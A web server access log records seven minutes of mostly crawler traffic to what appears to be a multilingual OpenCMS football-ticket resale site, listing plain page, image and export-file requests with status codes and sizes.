154.54.249.216 - - [19/Jul/2024:04:21:14 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=6649D754-FC9A-DD56-57CA-2EE91B2B3185 HTTP/1.1" 200 82161
217.113.194.220 - - [19/Jul/2024:04:21:23 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=78296403-093D-5D8F-011A-DB87D87C6529 HTTP/1.1" 200 100517
154.54.249.216 - - [19/Jul/2024:04:21:31 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9&eventid=53F27A05-DBF6-27A7-B680-C587F93AF7CA HTTP/1.1" 200 82987
147.28.79.253 - - [19/Jul/2024:04:21:31 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/?wbraid=CloKCQjw1920BhDPARJJAHLBw5QuDkZBVAsWbFtmmryFhghrqtx2daATBfBrN-wMeYc8LkqSw4nyKTeM7oJDf3RoaJQAHKBJ8JRQ_hJyq3ZKXy-ZWGjzshoC9Ow HTTP/1.1" 200 76552
185.157.223.150 - - [19/Jul/2024:04:21:32 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 48019142
66.249.79.172 - - [19/Jul/2024:04:21:33 +0200] "GET /ticket2/opencms/de/buy/?page=1&edid=B074E9A0-B62F-B78E-8307-B337944E8023 HTTP/1.1" 200 109177
147.28.79.253 - - [19/Jul/2024:04:21:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
87.236.176.242 - - [19/Jul/2024:04:21:35 +0200] "GET /ticket2/opencms/de/ HTTP/1.1" 200 94735
87.236.176.143 - - [19/Jul/2024:04:21:36 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
217.113.194.213 - - [19/Jul/2024:04:21:39 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9&eventid=53F27A05-DBF6-27A7-B680-C587F93AF7CA HTTP/1.1" 200 82369
47.128.16.225 - - [19/Jul/2024:04:21:44 +0200] "GET /ticket2/opencms/de/buy/?edid=9FC1378F-E622-E68B-4235-292F649392E8 HTTP/1.1" 200 71949
47.128.16.225 - - [19/Jul/2024:04:21:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.16.225 - - [19/Jul/2024:04:21:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.60.249.191 - - [19/Jul/2024:04:21:47 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=CD9CCE5B-E45C-7CA4-806C-47052D704B01 HTTP/1.1" 404 -
185.191.171.2 - - [19/Jul/2024:04:21:48 +0200] "GET /ticket2/opencms/de/en/sport/football-tickets/la-liga/granada/ HTTP/1.1" 404 -
217.113.194.221 - - [19/Jul/2024:04:21:48 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=78296403-093D-5D8F-011A-DB87D87C6529 HTTP/1.1" 200 100992
217.113.194.218 - - [19/Jul/2024:04:21:56 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=F603D761-976F-00E2-B927-85C4D97104AA HTTP/1.1" 200 83391
217.113.194.220 - - [19/Jul/2024:04:22:04 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9&eventid=53F27A05-DBF6-27A7-B680-C587F93AF7CA HTTP/1.1" 200 83397
66.249.76.160 - - [19/Jul/2024:04:22:11 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=%2Fsv%2Fbuy%2Findex.html%3Fpage%3D1%26edid%3D7FEA53CC-561A-BB4C-6D04-2BF6EF6C2401%26hlv%3D6693aa39-eb78-4533-9e5c-050c0a01000f%23v_1418756791 HTTP/1.1" 200 226
217.113.194.221 - - [19/Jul/2024:04:22:13 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=049DF1D3-266F-3465-3828-B9AD9176EE89 HTTP/1.1" 200 82161
114.119.158.193 - - [19/Jul/2024:04:22:13 +0200] "GET /ticket2/opencms/en/sell/?edid=71FDFE2C-EBDE-49DC-BC24-06DFE2ABAC3A HTTP/1.1" 302 -
114.119.158.193 - - [19/Jul/2024:04:22:18 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
217.113.194.221 - - [19/Jul/2024:04:22:21 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9&eventid=53F27A05-DBF6-27A7-B680-C587F93AF7CA HTTP/1.1" 200 82165
217.113.194.212 - - [19/Jul/2024:04:22:30 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A3372871-3019-08B8-80CE-74B78F441ACA&eventid=DFDFE3CE-4FC8-F7B9-D656-A64359A3D356 HTTP/1.1" 200 83521
206.168.34.55 - - [19/Jul/2024:04:22:32 +0200] "GET /ticket2/opencms/dk/ HTTP/1.1" 200 94454
206.168.34.55 - - [19/Jul/2024:04:22:37 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
217.113.194.217 - - [19/Jul/2024:04:22:38 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=78296403-093D-5D8F-011A-DB87D87C6529 HTTP/1.1" 200 99638
37.60.249.191 - - [19/Jul/2024:04:22:40 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=CD9CCE5B-E45C-7CA4-806C-47052D704B01&sortorder=desc&column=section HTTP/1.1" 404 -
63.143.42.252 - - [19/Jul/2024:04:22:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
63.143.42.252 - - [19/Jul/2024:04:22:42 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
217.113.194.221 - - [19/Jul/2024:04:22:47 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=C7133DB2-11AE-0675-7328-58F27D8E8199 HTTP/1.1" 200 84381
114.119.138.151 - - [19/Jul/2024:04:22:51 +0200] "GET /ticket2/opencms/en/venue/?venueid=41578BAC-B3C6-A54C-C6C5-8BDAB9EF23A9 HTTP/1.1" 200 70794
217.113.194.214 - - [19/Jul/2024:04:22:55 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=2A33B146-61D4-9234-966A-699DDE62E68F HTTP/1.1" 200 84381
110.238.106.57 - - [19/Jul/2024:04:23:02 +0200] "GET /ticket2/opencms/en/sport/football-tickets/bundesliga/darmstadt/ HTTP/1.1" 200 72353
217.113.194.220 - - [19/Jul/2024:04:23:04 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=B1E27EAD-2DAB-B132-68A0-815602472CC3 HTTP/1.1" 200 97741
37.60.249.191 - - [19/Jul/2024:04:23:11 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=D4B34039-2E18-B793-82DD-B729B5FBACD2&sortorder=desc&column=row HTTP/1.1" 404 -
217.113.194.218 - - [19/Jul/2024:04:23:20 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=B1E27EAD-2DAB-B132-68A0-815602472CC3 HTTP/1.1" 200 99270
217.113.194.214 - - [19/Jul/2024:04:23:29 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=D1150681-AEDA-FD90-10B4-D077F7FAD37D HTTP/1.1" 200 82974
114.119.134.51 - - [19/Jul/2024:04:23:30 +0200] "GET /ticket2/opencms/en/venue/?venueid=920488DA-5A31-2C02-38B5-7EC9E48B6D06 HTTP/1.1" 200 70712
66.249.76.8 - - [19/Jul/2024:04:23:34 +0200] "GET /ticket2/opencms/fi/venue/?venueid=99BBDD03-B532-23A3-9D30-60E65F950CC5 HTTP/1.1" 200 72283
217.113.194.218 - - [19/Jul/2024:04:23:37 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=A8C3CD81-201D-B4A4-E52D-57A2F254AB92 HTTP/1.1" 200 82986
37.60.249.191 - - [19/Jul/2024:04:23:53 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=D4B34039-2E18-B793-82DD-B729B5FBACD2&sortorder=desc&column=section HTTP/1.1" 404 -
217.113.194.216 - - [19/Jul/2024:04:23:53 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=D1150681-AEDA-FD90-10B4-D077F7FAD37D HTTP/1.1" 200 82368
47.128.57.212 - - [19/Jul/2024:04:24:01 +0200] "GET /ticket2/opencms/dk/buy/?edid=620EBF00-ABE0-9BB5-0F04-F120B08CF11C HTTP/1.1" 200 71437
47.128.57.212 - - [19/Jul/2024:04:24:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
217.113.194.219 - - [19/Jul/2024:04:24:02 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7CF2D645-F785-0CBB-1B7C-C4711617EAAD&eventid=98A172BE-77C2-F598-BEB3-A4F201F7A4A6 HTTP/1.1" 200 83743
47.128.57.212 - - [19/Jul/2024:04:24:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.113.194.213 - - [19/Jul/2024:04:24:10 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=A8C3CD81-201D-B4A4-E52D-57A2F254AB92 HTTP/1.1" 200 82380
217.113.194.215 - - [19/Jul/2024:04:24:19 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=0DB6A7C3-0396-810D-FC19-B3411E77B645 HTTP/1.1" 200 99885
37.60.249.191 - - [19/Jul/2024:04:24:25 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=DB8E6B8B-D5E6-2798-B4FA-A83F6B0F61B9&sortorder=desc&column=section HTTP/1.1" 404 -
217.113.194.215 - - [19/Jul/2024:04:24:27 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=C483161C-4419-F1CF-1E30-2319B48E0485 HTTP/1.1" 200 86206
37.123.143.245 - - [19/Jul/2024:04:24:28 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:04:24:28 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
216.244.66.196 - - [19/Jul/2024:04:24:31 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
217.113.194.220 - - [19/Jul/2024:04:24:36 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=F2BC003F-6BD3-B59A-E963-3F179C308086 HTTP/1.1" 200 83391
66.249.79.5 - - [19/Jul/2024:04:24:36 +0200] "GET /ticket2/opencms/nl/buy/?page=1&edid=A134960E-B2EE-5140-FE1D-DD5D90F5903C HTTP/1.1" 200 85931
217.113.194.219 - - [19/Jul/2024:04:24:44 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=1D4D6C4E-FAB4-14C9-DCD9-6C2A3F35B1FB HTTP/1.1" 200 85714
37.60.249.191 - - [19/Jul/2024:04:24:53 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=DFF88A32-7390-4A8F-4842-0A2C8B445E51&sortorder=asc&column=price HTTP/1.1" 404 -
216.244.66.238 - - [19/Jul/2024:04:24:53 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=19550F07-9055-3B6B-7785-B446F6EEEC6C HTTP/1.1" 200 86518
217.113.194.219 - - [19/Jul/2024:04:24:53 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=AFE3AB46-F6A8-DDB1-12A4-90AC014FE0AF HTTP/1.1" 200 82149
217.113.194.218 - - [19/Jul/2024:04:25:02 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7CF2D645-F785-0CBB-1B7C-C4711617EAAD&eventid=98A172BE-77C2-F598-BEB3-A4F201F7A4A6 HTTP/1.1" 200 83513
217.113.194.212 - - [19/Jul/2024:04:25:10 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=06E98D42-366B-3674-C3A7-94B87423A989 HTTP/1.1" 200 85662
37.60.249.191 - - [19/Jul/2024:04:25:17 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=DFF88A32-7390-4A8F-4842-0A2C8B445E51&sortorder=asc&column=row HTTP/1.1" 404 -
217.113.194.218 - - [19/Jul/2024:04:25:19 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=7016CF1B-CC52-94F9-4136-362E6D3CC9D6 HTTP/1.1" 200 84850
154.54.249.216 - - [19/Jul/2024:04:25:27 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=2D54F0A4-B7E5-1986-E461-A23A05E27C76 HTTP/1.1" 200 100122
216.244.66.238 - - [19/Jul/2024:04:25:27 +0200] "GET /ticket2/opencms/en/magazine/article?title=common-concepts-in-football HTTP/1.1" 200 79624
217.113.194.220 - - [19/Jul/2024:04:25:36 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=959EA1E3-E351-475E-F73F-8969C4E65582 HTTP/1.1" 200 82368
217.113.194.220 - - [19/Jul/2024:04:25:44 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=2A88ACA5-F2CC-5A54-E5C1-288C49B66BCA HTTP/1.1" 200 82380
217.113.194.219 - - [19/Jul/2024:04:25:53 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=06E98D42-366B-3674-C3A7-94B87423A989 HTTP/1.1" 200 86443
37.60.249.191 - - [19/Jul/2024:04:25:55 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=DFF88A32-7390-4A8F-4842-0A2C8B445E51&sortorder=asc&column=section HTTP/1.1" 404 -
217.113.194.220 - - [19/Jul/2024:04:26:01 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=B1E27EAD-2DAB-B132-68A0-815602472CC3 HTTP/1.1" 200 98617
66.249.79.233 - - [19/Jul/2024:04:26:09 +0200] "GET /ticket2/opencms/es/buy?page=1&edid=EC2BC309-3510-AA04-CA0C-F3088D5C1D31 HTTP/1.1" 200 101229
217.113.194.216 - - [19/Jul/2024:04:26:09 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=D0B62F92-773A-01D8-AF39-BADE4098B080 HTTP/1.1" 200 98599
66.249.79.231 - - [19/Jul/2024:04:26:10 +0200] "GET /ticket2/opencms/de/buy?page=1&edid=069EC406-6DFD-08ED-B6CC-A7E203415919 HTTP/1.1" 200 116081
66.249.68.39 - - [19/Jul/2024:04:26:11 +0200] "GET /ticket2/opencms/sv/standard/ HTTP/1.1" 200 84767
37.60.249.191 - - [19/Jul/2024:04:26:17 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=E0A53669-91D6-866E-C069-2204E55E6CA3&sortorder=asc&column=price HTTP/1.1" 404 -
217.113.194.214 - - [19/Jul/2024:04:26:18 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=B0072956-84A9-06A5-3C2B-4D5A36DEF172 HTTP/1.1" 200 84231
47.128.54.55 - - [19/Jul/2024:04:26:20 +0200] "GET /ticket2/opencms/fi/buy/?edid=9A8891BD-C3B9-2FD5-1633-7AEF0F073762 HTTP/1.1" 200 72632
47.128.54.55 - - [19/Jul/2024:04:26:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.54.55 - - [19/Jul/2024:04:26:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.113.194.221 - - [19/Jul/2024:04:26:26 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=7016CF1B-CC52-94F9-4136-362E6D3CC9D6 HTTP/1.1" 200 84231
217.113.194.215 - - [19/Jul/2024:04:26:35 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=AAAF9CBD-E20B-F830-6785-DFB285994112 HTTP/1.1" 200 87466
37.60.249.191 - - [19/Jul/2024:04:26:37 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=E0B4B777-7EB3-2A8E-35EC-2CB7F8614609 HTTP/1.1" 404 -
66.249.79.231 - - [19/Jul/2024:04:26:37 +0200] "GET /ticket2/opencms/fi/buy?page=1&edid=03C08C39-501F-FF78-A958-5E62ADCE683F HTTP/1.1" 200 101086
66.249.76.170 - - [19/Jul/2024:04:26:38 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=19422468-9239-E426-DB02-7FA0504E2BEC HTTP/1.1" 200 114695
217.113.194.220 - - [19/Jul/2024:04:26:43 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=2A33B146-61D4-9234-966A-699DDE62E68F HTTP/1.1" 200 86191
66.249.79.231 - - [19/Jul/2024:04:26:51 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=%2Fsv%2Fbuy%2Findex.html%3Fpage%3D1%26edid%3D9ACCA59E-E458-FD29-63EB-B5BB3CFD89B6%26hlv%3D6693aa1c-2f1c-4a6e-8159-050c0a01000f%23v609915973 HTTP/1.1" 200 224
217.113.194.218 - - [19/Jul/2024:04:26:52 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=A8C3CD81-201D-B4A4-E52D-57A2F254AB92 HTTP/1.1" 200 83391
66.249.76.170 - - [19/Jul/2024:04:26:58 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=9ACCA59E-E458-FD29-63EB-B5BB3CFD89B6&hlv=6693aa1c-2f1c-4a6e-8159-050c0a01000f HTTP/1.1" 200 108613
217.113.194.221 - - [19/Jul/2024:04:27:00 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=0DB6A7C3-0396-810D-FC19-B3411E77B645 HTTP/1.1" 200 101010
217.113.194.217 - - [19/Jul/2024:04:27:08 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=D0B62F92-773A-01D8-AF39-BADE4098B080 HTTP/1.1" 200 99719
114.119.145.239 - - [19/Jul/2024:04:27:16 +0200] "GET /ticket2/opencms/en/venue/?venueid=F7FD6FDC-72F2-5418-A11B-4CEA23D9F9E7 HTTP/1.1" 200 70790
217.113.194.213 - - [19/Jul/2024:04:27:17 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=B0072956-84A9-06A5-3C2B-4D5A36DEF172 HTTP/1.1" 200 85257
37.60.249.191 - - [19/Jul/2024:04:27:19 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=E9E2594D-B469-C9DF-4A89-8D0A7C0E1ED3&sortorder=asc&column=price HTTP/1.1" 404 -
217.113.194.212 - - [19/Jul/2024:04:27:25 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=A8C3CD81-201D-B4A4-E52D-57A2F254AB92 HTTP/1.1" 200 82161
217.113.194.215 - - [19/Jul/2024:04:27:33 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=AD8806A3-78A3-C85C-FD76-9A847D684299 HTTP/1.1" 200 82149
37.60.249.191 - - [19/Jul/2024:04:27:39 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=E9E2594D-B469-C9DF-4A89-8D0A7C0E1ED3&sortorder=asc&column=row HTTP/1.1" 404 -
136.243.222.140 - - [19/Jul/2024:04:27:40 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=5C3AFB2F-2529-59CA-3E55-76B2E3B91E86 HTTP/1.1" 200 102297
63.143.42.252 - - [19/Jul/2024:04:27:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
217.113.194.215 - - [19/Jul/2024:04:27:42 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=D1150681-AEDA-FD90-10B4-D077F7FAD37D HTTP/1.1" 200 82149
63.143.42.252 - - [19/Jul/2024:04:27:44 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
217.113.194.215 - - [19/Jul/2024:04:27:50 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=B0072956-84A9-06A5-3C2B-4D5A36DEF172 HTTP/1.1" 200 84026
114.119.159.6 - - [19/Jul/2024:04:27:50 +0200] "GET /ticket2/opencms/en/venue/?venueid=3ED5EA9D-5706-84F2-16D2-FC98CC15FF4D HTTP/1.1" 200 70722
217.113.194.212 - - [19/Jul/2024:04:27:59 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=2D882524-F20E-911C-330E-DB5F72C129F5 HTTP/1.1" 200 97657
37.60.249.191 - - [19/Jul/2024:04:28:03 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=E9E2594D-B469-C9DF-4A89-8D0A7C0E1ED3&sortorder=asc&column=section HTTP/1.1" 404 -
217.113.194.213 - - [19/Jul/2024:04:28:09 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=56CBA715-B928-D58F-6A08-8D95645745F0 HTTP/1.1" 200 97054
66.249.79.173 - - [19/Jul/2024:04:28:13 +0200] "GET /ticket2/opencms/fi/venue/?venueid=AF6FD165-4F1A-7FA7-C62D-5E8440EB560A HTTP/1.1" 200 72286
217.113.194.218 - - [19/Jul/2024:04:28:17 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=473D0D80-318B-9AEF-7923-42B4F01AAAE6 HTTP/1.1" 200 101329
217.113.194.213 - - [19/Jul/2024:04:28:25 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=ACB0BEF1-6CB8-5B86-2337-E2F38B94B10D HTTP/1.1" 200 82368
47.128.116.39 - - [19/Jul/2024:04:28:27 +0200] "GET /ticket2/opencms/no/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=C0DF818C-DB21-6E2E-4056-DB751FFE0C41 HTTP/1.1" 200 82449
47.128.116.39 - - [19/Jul/2024:04:28:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.116.39 - - [19/Jul/2024:04:28:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.154.89 - - [19/Jul/2024:04:28:30 +0200] "GET /ticket2/opencms/en/venue/?venueid=895DAA27-0D01-3F9A-C82D-1FA2A5BCB45B HTTP/1.1" 200 70704
37.60.249.191 - - [19/Jul/2024:04:28:31 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EA4DD9AE-DDBE-78E3-22DF-EC27364AEC73&sortorder=asc&column=row HTTP/1.1" 404 -
217.113.194.213 - - [19/Jul/2024:04:28:34 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=D707AC08-0150-71A1-15CE-72D181DDFCB2 HTTP/1.1" 200 82368
47.128.42.53 - - [19/Jul/2024:04:28:36 +0200] "GET /ticket2/opencms/es/buy/?edid=6181FC05-8F7D-2179-3117-3471D2069609 HTTP/1.1" 200 72706
47.128.42.53 - - [19/Jul/2024:04:28:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.42.53 - - [19/Jul/2024:04:28:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
